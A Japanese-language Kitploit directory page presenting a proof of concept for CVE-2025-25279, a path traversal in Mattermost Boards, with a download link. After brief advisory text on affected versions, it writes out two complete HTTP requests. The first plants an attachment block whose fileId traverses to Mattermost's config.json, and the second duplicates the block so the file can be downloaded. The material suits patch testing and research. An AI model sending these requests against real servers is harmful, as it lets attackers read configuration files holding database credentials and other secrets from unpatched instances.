Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-25279 — CVE-2025-25279 の概念実証: Mattermost Boards のパストラバーサルにより、巧妙に細工されたインポートアーカイブとボードの複製を介して任意のファイル読み取りが可能。 | Kitploit
ツール/GitHubGitHub/numanturle/cve-2025-25279
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集設定ミス
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

CVE-2025-25279 の概念実証: Mattermost Boards のパストラバーサルにより、巧妙に細工されたインポートアーカイブとボードの複製を介して任意のファイル読み取りが可能。

リポジトリを見る
421年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

セキュリティ勧告 MMSA-2025-00430 / CVE-2025-25279

概要

Mattermost Boards にファイルをアップロードした後、fileId パラメータが変更され、ボードがコピーされると、ファイルはパラメータで指定されたターゲットファイルを指し、ダウンロードするようになります。

影響を受けるバージョン: Boards が有効な Mattermost インスタンス CVE: CVE-2025-25279

説明

Mattermost バージョン 10.4.x <= 10.4.1、9.11.x <= 9.11.7、10.3.x <= 10.3.2、10.2.x <= 10.2.2 は、ボードのインポート時にボードブロックを適切に検証できません。これにより、攻撃者は Boards で特別に細工されたインポートアーカイブをインポートおよびエクスポートすることで、システム上の任意のファイルを読み取ることができます。

スクリーンショット

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


参考文献

  • Mattermost セキュリティアップデート
  • CWE-200: 情報漏洩
  • CVE-2025-25279

クレジットは私のものではありません。レビューを含みます

ツールをダウンロード